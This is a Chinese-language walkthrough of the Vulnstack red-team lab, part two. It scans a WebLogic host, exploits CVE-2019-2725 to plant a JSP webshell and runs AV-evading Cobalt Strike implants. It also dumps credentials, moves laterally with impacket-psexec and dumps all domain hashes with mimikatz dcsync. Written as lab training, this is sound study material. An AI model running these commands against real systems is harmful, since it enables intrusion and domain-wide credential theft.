这是红日的第二套靶场，一开始直接通过域管起的weblogic，有点别扭，建议还是通过本地的用户来起weblogic，漏洞利用的点很多，不要局限于这篇文章，可以多尝试尝试其他漏洞。

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 

密码均为:1qaz@WSX

靶场拓扑

需要自己起一下环境 C:OracleMiddlewareuser_projectsdomainsbase_domainbinstartWebLogic

端口扫描

nmap -sV -sS -p- -Pn 192.168.85.148

PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 7.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ssl/ms-wbt-server?
7001/tcp  open  http               Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
60966/tcp open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000; SP2
MAC Address: 00:0C:29:68:D3:5F (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

80端口是没有东西的，看一下7001端口，这是weblogic的默认端口 访问7001端口，报错页面，应该就能确定这是一个weblogic了

进入console尝试一下弱口令，结果是不出意外的进不去 直接工具扫一下,直接一把梭了

目标机器是存在多个漏洞的，这里使用Weblogic Wls9-async反序列化漏洞，CVE编号为CVE-2019-2725 

影响的版本为:Weblogic 10.x, Weblogic 12.1.3 漏洞描述：

该漏洞是由wls9-async组件导致的，该War包在反序列化处理的时候存在缺陷，可以在/_async/AsyncResponseService路径下构造恶意XML，从而导致在未授权的情况下远程命令执行

先上传一个jsp的木马，方便上传下载文件，这里直接用冰蝎自带的木马 将shell写入下面的路径

C:OracleMiddlewareuser_projectsdomainsbase_domainserversAdminServertmp_WL_internaluddiexplorer5f6ebwwarshell.jsp

关于weblogic上传路径如何选择可以参考:https://www.cnblogs.com/sstfy/p/10350915.html 

然后直接连接http://192.168.85.148:7001/uddiexplorer/shell.jsp即可

查看一下目标机器的进程，发现是存在360的

直接丢一个免杀马，上线cs，这里就可以看到这台机器是存在两张网卡

内网信息收集

首先通过cs抓一下密码，整理一下

本地用户
administrator:Admin@123

域用户 de1ay.com:
mssql:1qaz@WSX
administrator:1qaz@WSX
de1ay:1qaz@WSX

额。。。这里直接拿到域管的密码了，就当看不见，一台机器一台机器的打吧

拿到本地管理员密码，并且目标机器开启3389端口的，尝试登录到机器上，关掉360好做事情

已经知道目标机器是存在两张网卡的，192.168.85.1/24和10.10.10.1/24 上传fscan扫描一下这两个段 扫描192.168.85.1/24发现还存在一台192.168.85.151的机器，并且存在ms170-10漏洞

扫描10.10.10.1/24网段，10.10.10.10和10.10.10.201均存在ms17010漏洞

10.10.10.201和192.168.85.151是一台机器

基本可以确定这两个网段存活的主机了 整理一下主机信息

DC$     DC.de1ay.com    10.10.10.10
PC$     PC.de1ay.com    10.10.10.201,192.168.85.151
WEB$    WEB.de1ay.com   10.10.10.80,192.168.85.148

域管：administrator:1qaz@WSX
域用户：de1ay:1qaz@WSX，mssql:1qaz@WSX

既然PC这台机器是有外网IP的，那么直接通过msf打一下ms170-010 不出意外根本打不通

3389端口也连接不上....

先放一下看一下域控吧 设置一下cs的代理 可直接通过de1ay用户横向到DC,并且是system权限

proxychains4 impacket-psexec de1ay.com/de1ay:1qaz@[email protected]

直接通过cs自带的功能上线DC

上传mimikatz直接通过dcsync获取域内所有用户的hash

lsadump::dcsync /domain:de1ay.com /all /csv

直接通过域管的hash上线PC机器，三台机器全部上线cs

原文始发于微信公众号（鸿鹄实验室）：ATT&CK实战系列——红队实战（二）